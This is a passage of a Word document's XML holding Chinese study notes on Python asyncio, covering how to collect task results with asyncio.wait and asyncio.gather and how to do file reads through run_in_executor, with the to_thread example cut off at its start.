        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取异步函数返回值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A1DFFCF" w14:textId="77777777" w:rsidR="004E6350" w:rsidRDefault="004E6350" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08310A40" w14:textId="77777777" w:rsidR="006A55B1" w:rsidRDefault="006A55B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C62FD95" w14:textId="77777777" w:rsidR="006A55B1" w:rsidRDefault="006A55B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA73024" w14:textId="77777777" w:rsidR="006A55B1" w:rsidRPr="004C03EA" w:rsidRDefault="006A55B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004C03EA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>done, _ = loop.run_until_complete(</w:t>
      </w:r>
      <w:r w:rsidRPr="00267E08">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>asyncio.wait</w:t>
      </w:r>
      <w:r w:rsidRPr="004C03EA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(task_list))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FBA6A5" w14:textId="286DA8DB" w:rsidR="00DB7BED" w:rsidRDefault="006A55B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="004C03EA">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>results = [task.result() for task in done]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D2C201B" w14:textId="77777777" w:rsidR="00A938E9" w:rsidRDefault="00A938E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B24DEA7" w14:textId="77777777" w:rsidR="00A938E9" w:rsidRDefault="00A938E9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14E1FA5D" w14:textId="4180C333" w:rsidR="006A55B1" w:rsidRPr="00A938E9" w:rsidRDefault="00267E08" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A938E9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>另一个直接获取结果的写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683F346" w14:textId="77777777" w:rsidR="006A55B1" w:rsidRDefault="006A55B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>task_list = [ querySploitus(url=url, data_offset=10*x) for x in range(0,10) ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F18B859" w14:textId="77777777" w:rsidR="006A55B1" w:rsidRDefault="006A55B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CA9F256" w14:textId="1264E1BC" w:rsidR="006A55B1" w:rsidRDefault="006A55B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00267E08">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>results = loop.run_until_complete(</w:t>
      </w:r>
      <w:r w:rsidRPr="00267E08">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>asyncio.gather</w:t>
      </w:r>
      <w:r w:rsidRPr="00267E08">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00267E08">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>*task_list</w:t>
      </w:r>
      <w:r w:rsidRPr="00267E08">
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAF436D" w14:textId="58D8FD3E" w:rsidR="000B7335" w:rsidRDefault="000B7335" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>#</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> *</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>列表</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>意思就是，传入的列表中的元素被直接当作参数拿出来了，类似</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>golang</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>列表元素</w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t xml:space="preserve">… </w:t>
      </w:r>
      <w:r w:rsidRPr="000B7335">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>的写法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59EA40D2" w14:textId="77777777" w:rsidR="006A55B1" w:rsidRDefault="006A55B1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FCFBDD5" w14:textId="4F7F2C5D" w:rsidR="00D7379F" w:rsidRDefault="00D7379F" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>如何异步进行文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0EB6C3" w14:textId="77777777" w:rsidR="00562012" w:rsidRDefault="00562012" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75B3D518" w14:textId="77777777" w:rsidR="003E3B23" w:rsidRDefault="00562012" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003E3B23">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>如果文件非常大，推荐多线程或者多进程进行读取，而非异步。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28D54CA2" w14:textId="332E3F2F" w:rsidR="00CA622C" w:rsidRPr="003A37D4" w:rsidRDefault="00CA622C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>个人理解：因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>底层的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>IO</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>就不是异步的，所以</w:t>
      </w:r>
      <w:r w:rsidR="00FD43B9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这里也只能写一个仿代码来达到异步的写法，从而不阻塞主线程的运行。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3725EF6F" w14:textId="45226863" w:rsidR="00FD43B9" w:rsidRPr="003A37D4" w:rsidRDefault="00FD43B9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>但是，</w:t>
      </w:r>
      <w:r w:rsidR="003A37D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>这种</w:t>
      </w:r>
      <w:r w:rsidR="003A37D4" w:rsidRPr="003A37D4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>异步不是真正的异步，这种情况更适合多线程、多进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DDC1FB1" w14:textId="77777777" w:rsidR="003E3B23" w:rsidRDefault="003E3B23" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D5E2E3C" w14:textId="0F02EA1D" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Python </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的异步</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并没有直接提供异步的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。这是因为在许多操作系统中，文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>并不是异步的，因此</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>不能直接提供异步的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41207CA1" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1659F53F" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然而，你可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法将文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作放在一个单独的线程中执行，从而不阻塞你的主事件循环。例如，以下是一个异步读取文件的例子：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52258D02" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="059F7526" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="515DEA1A" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1AEAC33C" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>async def read_file(file_path):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B509BD4" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    loop = asyncio.get_event_loop()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E76F55A" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    with open(file_path, 'r') as file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54AF2F4C" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        # </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>运行在默认的</w:t>
      </w:r>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve"> executor </w:t>
      </w:r>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>中</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB659E3" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">        data = await loop.run_in_executor(None, file.read)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A34D27" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    return data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D3BC65" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75EF1F77" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>async def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="719721F2" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    data = await read_file('my_file.txt')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFE3BB9" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t xml:space="preserve">    print(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D45F6F5" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="701FEB2B" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>asyncio.run(main())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="138DCC7B" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="41EA47E6" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在这个例子中，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">read_file </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> loop.run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来在一个单独的线程中执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> file.read </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>方法。因为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> run_in_executor() </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>返回一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Future </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象，所以可以使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> await </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来等待文件读取完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D52BC1" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33FC65DA" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>请注意，如果你有大量的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，或者你的文件非常大，那么使用多线程或多进程可能会更有效。这是因为文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作通常是阻塞性的，如果你在主线程中执行大量的文件</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作，可能会阻塞你的程序。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DC34C2" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3EE0EB24" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要注意的是，从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Python 3.9</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>开始，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">asyncio </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>提供了</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> to_thread </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数，可以更方便地在新线程中运行阻塞的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> I/O </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1227AA" w14:textId="77777777" w:rsidR="0016254B" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7C887620" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E2DB5">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>import asyncio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A28B3DF" w14:textId="77777777" w:rsidR="0016254B" w:rsidRPr="008E2DB5" w:rsidRDefault="0016254B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
    </w:p>
